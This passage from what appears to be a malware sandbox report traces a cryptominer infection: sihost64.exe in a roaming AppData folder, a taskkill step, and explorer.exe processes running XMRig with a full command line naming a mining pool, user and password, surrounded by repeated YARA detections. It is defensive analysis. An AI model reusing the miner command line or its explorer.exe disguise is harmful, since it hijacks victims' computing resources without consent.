                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000015.00000002.810205943.00000224D7AD1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000015.00000002.818855585.00000224E8755000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000015.00000002.812013124.00000224E7AD9000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000015.00000002.812013124.00000224E7AD9000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000015.00000002.812013124.00000224E7AD9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000015.00000002.821696567.00000224E8D2D000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000015.00000002.821696567.00000224E8D2D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  Reputation:high

                                                                                                                                  Analysis Process: sihost64.exe PID: 6288 Parent PID: 6012

                                                                                                                                  General

                                                                                                                                  Start time:14:10:58
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:31232 bytes
                                                                                                                                  MD5 hash:A5D983222C60F4DCAE743F8E34806580
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Antivirus matches:
                                                                                                                                  • Detection: 100%, Avira

                                                                                                                                  Analysis Process: conhost.exe PID: 6040 Parent PID: 6288

                                                                                                                                  General

                                                                                                                                  Start time:14:10:58
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\System32\conhost.exe" "/sihost64
                                                                                                                                  Imagebase:0x7ff724c50000
                                                                                                                                  File size:625664 bytes
                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:.Net C# or VB.NET

                                                                                                                                  Analysis Process: cmd.exe PID: 4608 Parent PID: 6840

                                                                                                                                  General

                                                                                                                                  Start time:14:10:59
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:cmd" cmd /c taskkill /f /PID "6040
                                                                                                                                  Imagebase:0x7ff622070000
                                                                                                                                  File size:273920 bytes
                                                                                                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                  Analysis Process: conhost.exe PID: 6920 Parent PID: 4608

                                                                                                                                  General

                                                                                                                                  Start time:14:11:00
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  Imagebase:0x7ff724c50000
                                                                                                                                  File size:625664 bytes
                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                  Analysis Process: taskkill.exe PID: 6532 Parent PID: 4608

                                                                                                                                  General

                                                                                                                                  Start time:14:11:00
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Windows\System32\taskkill.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:taskkill /f /PID "6040"
                                                                                                                                  Imagebase:0x7ff747240000
                                                                                                                                  File size:94720 bytes
                                                                                                                                  MD5 hash:530C6A6CBA137EAA7021CEF9B234E8D4
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                  Analysis Process: explorer.exe PID: 4876 Parent PID: 6840

                                                                                                                                  General

                                                                                                                                  Start time:14:11:02
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80
                                                                                                                                  Imagebase:0x7ff6fee60000
                                                                                                                                  File size:3933184 bytes
                                                                                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000000.799518871.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000002.927522845.0000000140752000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000000.796871079.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000000.804927838.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001B.00000000.792450012.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001B.00000000.792450012.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000000.792450012.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001B.00000002.925771817.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001B.00000002.925771817.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000002.925771817.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001B.00000000.775205927.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001B.00000000.775205927.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000000.775205927.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001B.00000000.781428125.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001B.00000000.781428125.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000000.781428125.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001B.00000000.795242519.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001B.00000000.795242519.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000000.795242519.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000002.917920684.000000000130B000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000000.794400216.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001B.00000000.797423384.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001B.00000000.797423384.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000000.797423384.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001B.00000000.800236371.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001B.00000000.800236371.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000000.800236371.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001B.00000000.787692374.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001B.00000000.787692374.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000000.787692374.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001B.00000000.789535375.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001B.00000000.789535375.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000000.789535375.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001B.00000000.784425223.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001B.00000000.784425223.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000000.784425223.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001B.00000000.773135705.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001B.00000000.773135705.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000000.773135705.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001B.00000000.779800649.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001B.00000000.779800649.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000000.779800649.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001B.00000000.769582384.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001B.00000000.769582384.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000000.769582384.0000000140000000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                  Analysis Process: explorer.exe PID: 6924 Parent PID: 6012

                                                                                                                                  General

                                                                                                                                  Start time:14:11:02
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80
                                                                                                                                  Imagebase:0x7ff6fee60000
                                                                                                                                  File size:3933184 bytes
                                                                                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000002.927622766.0000000140752000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000000.819000457.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000000.801221568.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001C.00000000.798724965.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001C.00000000.798724965.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000000.798724965.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001C.00000000.784200823.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001C.00000000.784200823.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000000.784200823.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001C.00000000.796296289.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001C.00000000.796296289.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000000.796296289.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000002.918136554.00000000004BA000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001C.00000000.780903437.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001C.00000000.780903437.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000000.780903437.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001C.00000000.774089554.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001C.00000000.774089554.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000000.774089554.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001C.00000000.816102106.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001C.00000000.816102106.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000000.816102106.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000000.814593137.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001C.00000000.810219805.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001C.00000000.810219805.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000000.810219805.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001C.00000000.793171664.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001C.00000000.793171664.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000000.793171664.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001C.00000002.925901333.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001C.00000002.925901333.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000002.925901333.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000000.812542531.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001C.00000000.787529097.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001C.00000000.787529097.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000000.787529097.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001C.00000000.813277906.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001C.00000000.813277906.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000000.813277906.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001C.00000000.779272197.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001C.00000000.779272197.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000000.779272197.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000001C.00000000.789706786.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001C.00000000.789706786.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001C.00000000.789706786.0000000140000000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                  Disassembly

                                                                                                                                  Code Analysis

                                                                                                                                  Reset < >